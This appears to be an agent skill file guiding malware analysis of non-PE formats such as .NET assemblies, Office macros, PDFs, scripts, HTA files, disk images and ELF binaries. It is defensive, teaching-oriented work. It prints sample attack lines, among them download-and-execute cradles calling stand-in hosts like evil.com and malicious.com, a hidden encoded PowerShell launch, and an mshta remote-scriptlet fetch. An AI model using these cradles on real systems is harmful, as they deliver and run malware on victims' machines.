---
name: specialized-file-analyzer
description: Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, HTA files, disk images (ISO/IMG/VHD/VHDX), and Linux ELF binaries. Use when you encounter documents, scripts, disk images, or non-Windows executables that require format-specific analysis tools and techniques.
---
# Specialized File Analyzer
Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, HTA files, disk images, archives, and Linux binaries.
## When to Use This Skill
Use this skill when analyzing:
- **.NET/C# assemblies** (.exe, .dll with .NET framework)
- **Office documents** with macros (.docm, .xlsm, .doc, .xls)
- **PDF files** (suspicious attachments, exploit documents)
- **Scripts** (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- **HTA files** (.hta — HTML Applications executed by mshta.exe)
- **Disk images** (.iso, .img, .vhd, .vhdx — container formats that bypass MOTW)
- **Archives** (.zip, .rar, .7z, .tar.gz)
- **Shortcuts** (.lnk files)
- **Linux binaries** (ELF executables)
- **Batch files** (.bat, .cmd)
**Key indicator:** `file` command shows non-PE32 executable or document type.
## Quick File Type Identification
```bash
# Identify file type
file sample.bin
# Common outputs:
# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
# "Microsoft Office Document" → Office macro (use this skill)
# "PDF document, version 1.7" → PDF (use this skill)
# "HTML document text" → Check extension; if .hta → HTA (use this skill)
# "ISO 9660 CD-ROM filesystem data" → ISO image (use this skill)
# "DOS/MBR boot sector" → IMG disk image (use this skill)
# "Microsoft Disk Image" → VHD/VHDX (use this skill)
# "Zip archive data" → Archive (use this skill)
# "ELF 64-bit LSB executable" → Linux binary (use this skill)
# "ASCII text, with CRLF line terminators" → Script (use this skill)
```
---
## .NET / C# Assembly Analysis
### Detection
```bash
# Check for .NET assembly
file sample.exe | grep "Mono/.Net assembly"
# Or check strings
strings sample.exe | grep "mscoree.dll"
# Check PE header
pe-parser sample.exe | grep "CLR Runtime"
```
### Tool: dnSpy (Windows - Primary Tool)
**Download:** https://github.com/dnSpy/dnSpy
**Workflow:**
1. Open sample.exe in dnSpy
2. Navigate: Assembly Explorer → sample.exe → Namespace → Classes
3. Find entry point: Right-click assembly → Go to Entry Point
**What to Look For:**
**Main() Function:**
```csharp
// Entry point - start here
public static void Main(string[] args)
{
// Analyze execution flow
}
```
**Suspicious Namespaces:**
- `System.Net` - Network operations (WebClient, HttpClient)
- `System.Security.Cryptography` - Encryption/decryption
- `System.Reflection` - Dynamic code loading
- `System.Diagnostics.Process` - Process execution
- `System.IO` - File operations
- `Microsoft.Win32` - Registry access
**Common Malicious Patterns:**
```csharp
// Download and execute
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");
// Base64 decode embedded payload
byte[] decoded = Convert.FromBase64String(encodedPayload);
// Reflective loading
Assembly.Load(byte[] rawAssembly);
// Process injection
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);
```
**Extract Embedded Resources:**
```
Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)
Right-click resource → Save
```
**Deobfuscation:**
```bash
# Using de4dot (automated deobfuscator)
de4dot sample.exe -o sample_deobfuscated.exe
# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator
# - Agile.NET
```
**Dynamic Debugging:**
```
dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings
```
### Tool: ILSpy (Cross-platform Alternative)
```bash
# Command-line decompilation
ilspycmd sample.exe -o output_directory/
# GUI version (Windows/Linux/Mac)
ilspy sample.exe
```
**Export decompiled code:**
```
File → Save Code → C# Project
```
### Analysis Checklist - .NET
- [ ] Entry point identified (Main function)
- [ ] Obfuscation detected and removed (if needed)
- [ ] Embedded resources extracted
- [ ] Network URLs/IPs extracted
- [ ] Crypto keys identified
- [ ] Anti-analysis checks found
- [ ] Payload execution method documented
- [ ] IOCs extracted (URLs, IPs, file paths)
---
## Office Document / Macro Analysis
### Detection
```bash
# Macro-enabled formats
# .docm, .xlsm, .pptm → Office 2007+ with macros
# .doc, .xls, .ppt → Legacy Office (97-2003) with macros
file document.docm
# Output: "Microsoft Word 2007+"
# Quick macro check
strings document.docm | grep -i "vba\|macro\|autoopen"
```
### Tool: oledump.py (Primary - Didier Stevens)
**Installation:**
```bash
wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip
```
**Workflow:**
**1. List Streams:**
```bash
python oledump.py document.docm
# Example output:
# 1: 114 '\x01CompObj'
# 2: 4096 '\x05DocumentSummaryInformation'
# 3: M 8192 'Macros/VBA/ThisDocument' ← Macro present (M indicator)
# 4: m 1024 'Macros/VBA/_VBA_PROJECT'
# 5: M 4096 'Macros/VBA/Module1'
```
**2. Extract Macro Code:**
```bash
# Extract macro from stream 3
python oledump.py -s 3 -v document.docm
# Decompress corrupted VBA
python oledump.py -s 3 --vbadecompresscorrupt document.docm
# Save to file
python oledump.py -s 3 -v document.docm > extracted_macro.vba
```
**3. Analyze Macro Code:**
Look for **Auto-Execution Functions:**
```vba
Sub AutoOpen() ' Word - runs on document open
Sub Document_Open() ' Word - runs on document open
Sub Workbook_Open() ' Excel - runs on workbook open
Sub Auto_Open() ' Excel - runs on workbook open
```
Look for **Suspicious VBA Functions:**
```vba
' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."
' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...
' File system operations
CreateObject("Scripting.FileSystemObject")
' Dynamic code execution
ExecuteStatement
Eval()
CallByName()
```
### Tool: olevba (oletools Suite)
**Installation:**
```bash
pip install oletools
```
**Automated Analysis:**
```bash
# Comprehensive analysis
olevba document.docm
# Decode obfuscated strings
olevba --decode document.docm
# JSON output for parsing
olevba -j document.docm > analysis.json
# Extract IOCs only
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"
```
**Output Interpretation:**
- **AutoExec** - Auto-execution keywords found
- **Suspicious** - Suspicious VBA keywords
- **IOCs** - URLs, IPs, file paths
- **Hex Strings** - Encoded data
- **Base64 Strings** - Encoded payloads
- **Dridex Strings** - Dridex malware indicators
### Excel 4.0 Macros (XLM Macros)
**More evasive than VBA macros!**
```bash
# Detect XLM macros
python oledump.py document.xls | grep XL
# Extract with XLMMacroDeobfuscator
git clone https://github.com/DissectMalware/XLMMacroDeobfuscator
python XLMMacroDeobfuscator.py -f document.xls
# Or use olevba
olevba document.xls --deobf
```
### Modern Office Documents (.docx, .xlsx) - No Macros
**Template Injection Attack:**
```bash
# Extract Office Open XML structure
unzip document.docx -d extracted/
# Check for external template
cat extracted/word/_rels/document.xml.rels | grep "http"
# Look for:
#
```
**Embedded Objects:**
```bash
# Check for embedded files
ls extracted/word/embeddings/
# Analyze embedded objects
file extracted/word/embeddings/*
```
### Analysis Checklist - Office Documents
- [ ] Macro presence confirmed
- [ ] All macro streams extracted
- [ ] Auto-execution functions identified
- [ ] Obfuscated strings decoded
- [ ] Download URLs extracted
- [ ] Payload execution method documented
- [ ] External template checked (.docx/.xlsx)
- [ ] Embedded objects analyzed
- [ ] IOCs extracted and defanged
---
## PDF Analysis
### Detection
```bash
file document.pdf
# Output: "PDF document, version 1.7"
```
### Tool: pdfid.py (Didier Stevens)
**Quick Triage:**
```bash
python pdfid.py document.pdf
# Red flags:
# /OpenAction - Executes action on open
# /AA - Additional actions (auto-execute)
# /JavaScript - Embedded JavaScript
# /JS - JavaScript (short form)
# /Launch - Launch external program
# /EmbeddedFile - Embedded files
# /RichMedia - Flash/multimedia content
# /ObjStm - Object streams (can hide malicious content)
```
**Example Output:**
```
PDFiD 0.2.7 document.pdf
PDF Header: %PDF-1.7
obj 45
endobj 45
stream 12
endstream 12
/Page 5
/Encrypt 0
/ObjStm 0
/JS 3 ← Suspicious!
/JavaScript 2 ← Suspicious!
/AA 1 ← Auto-action present!
/OpenAction 1 ← Executes on open!
/Launch 0
/EmbeddedFile 0
/RichMedia 0
```
### Tool: pdf-parser.py (Didier Stevens)
**Extract JavaScript:**
```bash
# Search for JavaScript objects
python pdf-parser.py --search javascript document.pdf
# Extract specific object
python pdf-parser.py --object 15 document.pdf
# Dump JavaScript code
python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
# Filter streams
python pdf-parser.py --filter document.pdf
```
### Tool: peepdf (Interactive Analysis)
```bash
# Install (peepdf-3 is the Python 3 compatible fork)
pip install peepdf-3
# Interactive mode
peepdf -i document.pdf
# Commands in interactive shell:
> tree # Show object structure
> object 15 # Inspect object 15
> stream 15 # View stream 15
> javascript # Extract all JavaScript
> extract stream 15 > payload.bin
```
### PDF Exploits
**Common CVEs:**
- **CVE-2013-2729** - JavaScript heap spray
- **CVE-2010-0188** - libtiff buffer overflow
- **CVE-2009-0927** - JBIG2Decode heap overflow
- **CVE-2023-21608** - Adobe Acrobat use-after-free (remote code execution)
- **CVE-2023-26369** - Adobe Acrobat out-of-bounds write (actively exploited in the wild)
- **CVE-2024-4367** - PDF.js arbitrary JavaScript execution in Firefox (affects web-based PDF viewers)
- **CVE-2023-36664** - Ghostscript command injection via crafted PDF (affects Linux/server-side rendering)
**Shellcode Detection:**
```bash
# Look for shellcode in streams
python pdf-parser.py --raw --filter document.pdf | grep -E "(\x90{10}|\xeb)"
# Extract suspicious streams
python pdf-parser.py --object --raw document.pdf | hexdump -C
```
### Analysis Checklist - PDF
- [ ] pdfid scan completed (flags identified)
- [ ] JavaScript extracted (if present)
- [ ] Embedded files extracted
- [ ] Auto-action mechanism documented
- [ ] Shellcode indicators checked
- [ ] CVE exploitation checked (if relevant)
- [ ] URLs/IPs extracted from JS
- [ ] IOCs documented
---
## PowerShell / Script Analysis
### PowerShell (.ps1) Deobfuscation
**Common Obfuscation Patterns:**
**Base64 Encoding:**
```powershell
# Encoded command execution
powershell.exe -EncodedCommand
# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
```
**String Concatenation:**
```powershell
$url = "ht" + "tp://" + "evil.com"
```
**Compression:**
```powershell
$ms = New-Object IO.MemoryStream
$ms.Write([Convert]::FromBase64String($compressed), 0, $compressedLength)
$ms.Seek(0,0) | Out-Null
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
```
### Tool: PSDecode
```bash
# Install
git clone https://github.com/R3MRUM/PSDecode
# Deobfuscate PowerShell
Import-Module .\PSDecode.ps1
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt
```
**Manual Analysis:**
```powershell
# Read script without executing
Get-Content malicious.ps1
# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"
```
**Suspicious PowerShell Patterns:**
- `Invoke-Expression` / `IEX` - Execute string as code
- `Invoke-WebRequest` / `Invoke-RestMethod` - Download content
- `DownloadString` / `DownloadFile` - Download payloads
- `FromBase64String` - Decode embedded payload
- `IO.Compression.GzipStream` - Decompress payload
- `Reflection.Assembly]::Load` - Load assembly from memory
- `-EncodedCommand` - Base64 encoded command
- `-WindowStyle Hidden` - Hide window
- `-ExecutionPolicy Bypass` - Bypass script execution policy
### VBScript (.vbs) Analysis
**Common Obfuscation Techniques:**
**Chr() Concatenation:**
```vbs
' Characters assembled from ASCII codes to hide strings
Dim cmd
cmd = Chr(99) & Chr(109) & Chr(100) ' = "cmd"
CreateObject("WScript.Shell").Run cmd & ".exe /c " & Chr(112) & Chr(105) & Chr(110) & Chr(103) & " evil.com"
```
**Execute / ExecuteGlobal:**
```vbs
' Execute() runs a string as code in the current scope
' ExecuteGlobal() runs a string as code in the global scope
Dim payload
payload = "CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ").Run " & Chr(34) & "calc.exe" & Chr(34)
Execute(payload)
' Chained: decode then execute
ExecuteGlobal(Base64Decode(encodedPayload))
```
**String Reversal with StrReverse:**
```vbs
' String stored backwards to evade signature detection
Dim hidden
hidden = "elbatius/c/ exe.dmc"
CreateObject("WScript.Shell").Run StrReverse(hidden)
```
**Replace() Chains:**
```vbs
' Junk characters inserted and stripped at runtime
Dim url
url = "hXXXtXXXtXXXpXXX:XXXXX//evil.com/payload.exe"
url = Replace(url, "XXX", "") ' = "http://evil.com/payload.exe"
```
**WScript.Shell via GetObject:**
```vbs
' Alternative to CreateObject — avoids direct string "WScript.Shell"
Set sh = GetObject("new:{72C24DD5-D70A-438B-8A42-98424B88AFB8}")
sh.Run "powershell -nop -w hidden -enc "
```
**Deobfuscation Approach:**
**Manual Chr() Resolution:**
```bash
# Extract all Chr() calls and resolve them
grep -oE "Chr\([0-9]+\)" malicious.vbs | sort -u
# Python one-liner to resolve Chr values from grep output
python3 -c "
import re, sys
code = open('malicious.vbs').read()
for m in re.finditer(r'Chr\((\d+)\)', code):
print(f'Chr({m.group(1)}) = {chr(int(m.group(1)))}')
"
```
**Extract Execute() Payloads:**
```vbs
' SAFE deobfuscation technique:
' Replace Execute() / ExecuteGlobal() with WScript.Echo() to print payload instead of running it
' Original:
Execute(decodedPayload)
' Change to:
WScript.Echo(decodedPayload)
' Then run in a safe environment to reveal the next stage
cscript /nologo malicious_safe.vbs
```
**Variable Substitution Tracing:**
```bash
# Trace variable assignments to follow payload construction
grep -n "=" malicious.vbs | grep -v "'.*=" # exclude comments
# Follow each variable from assignment to use, reconstructing the final value
```
**Key Suspicious Patterns:**
- `CreateObject("WScript.Shell")` - Execute OS commands, launch processes
- `GetObject("winmgmts:")` - WMI access (process creation, system enumeration)
- `Shell.Application` - Explorer shell invocation (can bypass some restrictions)
- `ADODB.Stream` - Binary file writes (used to drop PE payloads to disk)
- `MSXML2.XMLHTTP` / `WinHttp.WinHttpRequest` - HTTP download cradles
- `Scripting.FileSystemObject` - File system reads and writes
- `Execute` / `ExecuteGlobal` / `Eval` - Dynamic code execution (always deobfuscate before analyzing)
- `StrReverse` / `Chr()` / `Replace()` - String obfuscation primitives
**Analysis:**
```bash
# Read script
cat malicious.vbs
# Search for high-priority patterns
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute\|ExecuteGlobal\|ADODB.Stream\|GetObject\|StrReverse" malicious.vbs
# Deobfuscate: Replace Eval() / Execute() with WScript.Echo() to print instead of execute
# Then run safely: cscript /nologo malicious_safe.vbs
```
### JavaScript (.js) Analysis
```bash
# Beautify obfuscated JS
cat malicious.js | js-beautify > beautified.js
# Online: https://beautifier.io/
```
**Suspicious Patterns:**
```javascript
// Code execution
eval(encodedCode);
// Decode strings
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");
// ActiveX (Windows COM objects)
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");
// WScript objects
var fso = new ActiveXObject("Scripting.FileSystemObject");
```
### Analysis Checklist - Scripts
- [ ] Script type identified (PS1, VBS, JS, BAT)
- [ ] Obfuscation detected and removed
- [ ] Base64/encoded strings decoded
- [ ] Download URLs extracted
- [ ] Execution commands documented
- [ ] Dropped file paths identified
- [ ] IOCs extracted (URLs, IPs, domains)
---
## Archive Analysis
### Safe Inspection (No Extraction)
```bash
# List contents without extracting
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar
# Look for red flags:
# - Double extensions (invoice.pdf.exe)
# - Executable files (.exe, .scr, .com, .bat, .vbs)
# - LNK files (shortcuts)
# - Deeply nested archives (archive.zip -> archive2.zip -> payload.exe)
```
### Extract Safely
```bash
# Create isolated directory
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive
# Extract
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz
# Immediately check file types
file *
```
### Password-Protected Archives
**Common passwords in malware:**
- `infected`
- `malware`
- `virus`
- `2024` / `2025`
- `123456`
```bash
# Extract with password
7z x -pinfected archive.zip
unzip -P infected archive.zip
```
### LNK (Shortcut) File Analysis
**Tool: LECmd (Windows)**
```powershell
# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk
```
**Tool: lnkinfo (Linux)**
```bash
lnkinfo malicious.lnk
# Look for:
# - Target path (what it executes)
# - Command-line arguments
# - Working directory
# - Icon location (may reveal payload location)
```
**Manual Strings Analysis:**
```bash
strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
```
### Analysis Checklist - Archives
- [ ] Contents listed without extraction
- [ ] File extensions verified (no double extensions)
- [ ] Files extracted to isolated directory
- [ ] All extracted files typed (file command)
- [ ] LNK files analyzed (if present)
- [ ] Nested archives checked
- [ ] Password documented (if applicable)
---
## HTA (HTML Application) Analysis
### What HTA Files Are
HTA files (`.hta`) are HTML documents executed by `mshta.exe` (Microsoft HTML Application Host) rather than a web browser. Because mshta.exe is a trusted Windows binary, HTAs run with the full privileges of the current user and have unrestricted access to COM objects, ActiveX controls, and the local file system — none of the browser sandbox restrictions apply. This makes HTAs a popular delivery vehicle for malware, often distributed via phishing emails or dropped inside ISO/ZIP archives.
**MITRE ATT&CK: T1218.005 — System Binary Proxy Execution: Mshta**
### Detection
```bash
# File identification
file suspicious.hta
# Output: "HTML document text" (always verify the extension separately)
# Quick check for execution indicators
strings suspicious.hta | grep -iE "mshta|WScript|Shell|ActiveX|XMLHTTP|powershell"
```
### Analysis Approach
HTAs are plain text — open them in any text editor or IDE. The analysis goal is to extract and understand all embedded scripts before any execution occurs.
**1. Extract Embedded Scripts**
```bash
# View raw content
cat suspicious.hta
# Grep for script blocks
grep -i "
```
**mshta.exe executing inline script (seen in phishing URLs):**
```
mshta.exe javascript:a=(GetObject("script:http://malicious[.]com/payload.sct")).Exec();close();
```
### Tools
| Task | Tool |
|------|------|
| Read/edit HTA content | Any text editor (VS Code, Notepad++, vim) |
| DOM structure inspection | Browser dev tools (open as HTML — do NOT click Run) |
| Decode base64 strings | `base64 -d` (Linux), CyberChef |
| Chr()/VBS deobfuscation | Manual or `cscript` with Execute→Echo swap (see VBScript section) |
| Trace COM object calls | Process Monitor (filter on mshta.exe) — dynamic analysis VM only |
### Analysis Checklist - HTA
- [ ] File opened as plain text — script language identified (VBScript / JScript / mixed)
- [ ] All `CreateObject` / `new ActiveXObject` calls enumerated
- [ ] `Shell.Run` / `ShellExecute` arguments extracted
- [ ] Download URLs identified (XMLHTTP, WinHttp, URLDownloadToFile)
- [ ] Encoded payloads (base64, Chr(), HTML entities) decoded
- [ ] innerHTML / injected DOM payload sources checked
- [ ] Dropped file paths documented
- [ ] IOCs extracted and defanged
---
## Disk Image Analysis (ISO / IMG / VHD / VHDX)
### Why Malware Uses Disk Images
Disk images are a primary MOTW (Mark-of-the-Web) bypass technique on Windows 10 and 11. When a file is downloaded from the internet, Windows attaches a Zone Identifier alternate data stream (`Zone.Identifier:$DATA`, Zone 3) to flag it as untrusted. Files extracted from a mounted disk image do **not** inherit the source image's MOTW, so payloads inside an ISO/VHD execute without SmartScreen prompts or Protected View restrictions.
Additionally, `.iso` files auto-mount as a virtual DVD drive on double-click in Windows 10+, and `.vhd`/`.vhdx` files auto-mount as a virtual disk — making the delivery seamless for the victim.
**MITRE ATT&CK: T1553.005 — Subvert Trust Controls: Mark-of-the-Web Bypass**
### Detection
```bash
file suspicious.iso
# "ISO 9660 CD-ROM filesystem data"
file suspicious.img
# "DOS/MBR boot sector" or "Linux rev 1.0 ext2 filesystem data"
file suspicious.vhd
# "Microsoft Disk Image, Virtual Server or Virtual PC, version 0x00010000"
file suspicious.vhdx
# "Microsoft Disk Image eXtended"
```
### Analysis Approach
Always analyze disk images **read-only** and **without executing** any contained files outside an isolated VM.
**Option A: Extract Without Mounting (Safest — 7-Zip)**
Works on Linux, Windows, and macOS. No kernel interaction required.
```bash
# List contents first
7z l suspicious.iso
# Extract to isolated directory
mkdir /tmp/iso_contents
7z x suspicious.iso -o/tmp/iso_contents/
# Identify all extracted files
file /tmp/iso_contents/*
find /tmp/iso_contents/ -type f | xargs file
```
**Option B: Mount Read-Only (Linux)**
```bash
# ISO / IMG
sudo mkdir /mnt/suspicious_iso
sudo mount -o loop,ro suspicious.iso /mnt/suspicious_iso
# List all files including hidden
ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -type f
# Identify file types
find /mnt/suspicious_iso/ -type f -exec file {} \;
# Copy files out for analysis (do not execute in place)
cp -r /mnt/suspicious_iso/ /tmp/iso_extracted/
# Unmount when done
sudo umount /mnt/suspicious_iso
```
**Option C: Mount Read-Only (Windows — analysis VM only)**
```powershell
# Mount as read-only virtual drive
$img = Mount-DiskImage -ImagePath "C:\analysis\suspicious.iso" -Access ReadOnly -PassThru
$driveLetter = ($img | Get-Volume).DriveLetter
# List all files including hidden
Get-ChildItem "${driveLetter}:\" -Recurse -Force | Select FullName, Attributes, Length
# Copy contents for analysis
Copy-Item "${driveLetter}:\*" "C:\analysis\extracted\" -Recurse -Force
# Dismount
Dismount-DiskImage -ImagePath "C:\analysis\suspicious.iso"
```
**VHD/VHDX on Linux:**
```bash
# Install qemu tools if needed
sudo apt install qemu-utils
# Convert VHD to raw for mounting
qemu-img convert -f vpc suspicious.vhd suspicious_raw.img
sudo mount -o loop,ro suspicious_raw.img /mnt/vhd_mount/
```
### What to Look For
**1. LNK + Hidden DLL/EXE (Most Common Pattern)**
The canonical ISO malware delivery pattern:
```
archive.iso/
Invoice.lnk <- Victim double-clicks this
document.pdf <- Decoy shown to victim
payload.dll <- Hidden (file attribute set); executed by LNK via rundll32
```
```bash
# Find hidden files (Linux mount)
find /mnt/suspicious_iso/ -name ".*"
ls -la /mnt/suspicious_iso/
# Analyze LNK files
lnkinfo Invoice.lnk # Linux
strings Invoice.lnk | grep -E "\.exe|\.dll|rundll32|cmd|powershell"
```
**2. Decoy Documents**
Disk images frequently contain a visible, benign-looking document (PDF, DOCX) displayed to the victim while the payload runs in the background. Flag any document files and analyze them separately using the appropriate section of this skill.
**3. File Naming Tricks**
```bash
# Check for double extensions and right-to-left override (RTLO) tricks
ls -la /mnt/suspicious_iso/
# e.g. a filename containing U+202E (RTLO) makes "exe.doc" display as "cod.exe"
# Detect non-ASCII characters in filenames
find /mnt/suspicious_iso/ -print | cat -v | grep -v "^[[:print:]]*$"
```
**4. Autorun Configuration**
```bash
# Check for autorun.inf (older technique, still seen in IMG files)
cat /mnt/suspicious_iso/autorun.inf 2>/dev/null
```
### Contained File Routing
Once files are extracted, route each to the appropriate analysis path:
| Extracted File Type | Next Step |
|---------------------|-----------|
| `.lnk` | LNK Analysis section (this skill) |
| `.dll` / `.exe` (PE) | malware-triage then malware-dynamic-analysis |
| `.ps1` / `.vbs` / `.js` | Script Analysis section (this skill) |
| `.docm` / `.xlsm` | Office Macro Analysis section (this skill) |
| `.hta` | HTA Analysis section (this skill) |
| Nested `.zip` / `.iso` | Repeat disk image / archive analysis |
### Analysis Checklist - Disk Images
- [ ] File type confirmed (`file` command)
- [ ] Contents listed before extraction
- [ ] Extracted to isolated directory (read-only mount or 7-Zip)
- [ ] All files identified with `file` command (do not trust extensions)
- [ ] Hidden files checked (`-a` flag / `Get-ChildItem -Force`)
- [ ] LNK files analyzed — target, arguments, working directory documented
- [ ] Decoy documents identified
- [ ] RTLO / double-extension filename tricks checked
- [ ] autorun.inf inspected (if present)
- [ ] Payload files routed to appropriate analysis skill
- [ ] MOTW bypass technique documented in report
---
## Linux / ELF Binary Analysis
### Detection
```bash
file sample.bin
# Output: "ELF 64-bit LSB executable, x86-64"
```
### Static Analysis
**ELF Header:**
```bash
readelf -h sample.bin
# Shows:
# - Architecture (x86, x86-64, ARM)
# - Entry point address
# - Program header offset
# - Section header offset
```
**Sections:**
```bash
readelf -S sample.bin
# Look for suspicious sections:
# - High entropy sections (encrypted/packed)
# - Unusual section names
# - RWX sections (read-write-execute)
```
**Imported Libraries:**
```bash
ldd sample.bin
# Look for:
# - libssl.so (crypto/network)
# - libc.so (standard)
# - Unusual paths (/tmp/lib.so)
```
**Imported Symbols:**
```bash
nm -D sample.bin
objdump -T sample.bin
# Search for suspicious functions:
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
```
**Strings:**
```bash
strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
```
### Dynamic Analysis (Linux)
**strace - System Call Monitoring:**
```bash
# Monitor all system calls
strace -f ./sample.bin 2>&1 | tee strace_output.txt
# Monitor specific calls
strace -e trace=network,file,process ./sample.bin
# File operations only
strace -e trace=open,read,write,close ./sample.bin
# Network operations only
strace -e trace=socket,connect,send,recv ./sample.bin
```
**ltrace - Library Call Monitoring:**
```bash
ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt
```
**Check for Packing:**
```bash
# UPX detection
readelf -S sample.bin | grep UPX
# Unpack UPX
upx -d sample.bin -o sample_unpacked.bin
```
### Analysis Checklist - ELF
- [ ] Architecture identified (x86/x64/ARM)
- [ ] Imported libraries documented
- [ ] Suspicious functions identified
- [ ] Packing detected and removed (if UPX)
- [ ] Strings extracted and analyzed
- [ ] System calls monitored (strace)
- [ ] Network activity captured
- [ ] File operations documented
---
## Integration with Report Writing
Each file type contributes specific sections to the malware analysis report:
**.NET Analysis** →
- Decompiled code snippets
- Embedded resource descriptions
- Obfuscation techniques used
- Reflective loading mechanisms
**Office Macros** →
- Macro code (sanitized)
- Auto-execution methods
- Download URLs
- Payload dropping process
**PDF Analysis** →
- Embedded JavaScript
- Auto-action triggers
- Exploit CVEs (if applicable)
- Shellcode presence
**Scripts** →
- Deobfuscated code
- Execution flow
- Download cradles
- C2 communications
**Archives/LNK** →
- Archive structure
- Masquerading techniques
- LNK target analysis
- Social engineering aspects
**HTA Files** →
- Extracted VBScript/JScript
- ActiveX objects abused
- Download cradle URLs
- PowerShell invocation chains
**Disk Images (ISO/VHD)** →
- Container structure and hidden files
- MOTW bypass technique documented
- LNK target and payload relationship
- Decoy document identified
**ELF Binaries** →
- System calls used
- Network protocols
- Persistence mechanisms (cron, systemd)
- Rootkit indicators
---
## Tool Quick Reference
| File Type | Primary Tool | Secondary Tool |
|-----------|--------------|----------------|
| **.NET** | dnSpy | ILSpy, de4dot |
| **Office Macros** | oledump.py | olevba, XLMMacroDeobfuscator |
| **PDF** | pdfid.py, pdf-parser.py | peepdf |
| **PowerShell** | PSDecode | Manual analysis |
| **VBScript/JS** | Text editor + analysis | js-beautify |
| **HTA** | Text editor + grep | CyberChef (decode), Process Monitor (dynamic) |
| **ISO/IMG/VHD/VHDX** | 7-Zip (extract), mount -o ro (Linux) | Mount-DiskImage (Windows), qemu-utils (VHD) |
| **Archives** | 7z, unzip, tar | - |
| **LNK** | LECmd (Win), lnkinfo (Linux) | strings |
| **ELF** | readelf, nm, objdump | strace, ltrace |
---
## Best Practices
**Do:**
- Always identify file type first (`file` command)
- Extract in isolated environments
- Document obfuscation techniques
- Save original and deobfuscated versions
- Test extracted IOCs for accuracy
- Cross-reference with VirusTotal/MalwareBazaar
**Don't:**
- Execute scripts without understanding them first
- Trust file extensions (check magic bytes)
- Skip deobfuscation steps
- Extract archives directly to important directories
- Assume password-protected = safe
---
## Example Usage
**User request:** "I have a suspicious .docm file with macros, help me analyze it"
**Workflow:**
1. Confirm file type (Office document)
2. Use oledump.py to list streams
3. Extract VBA macro code
4. Identify auto-execution functions
5. Decode obfuscated strings
6. Extract download URLs and IOCs
7. Document payload delivery method
8. Prepare findings for report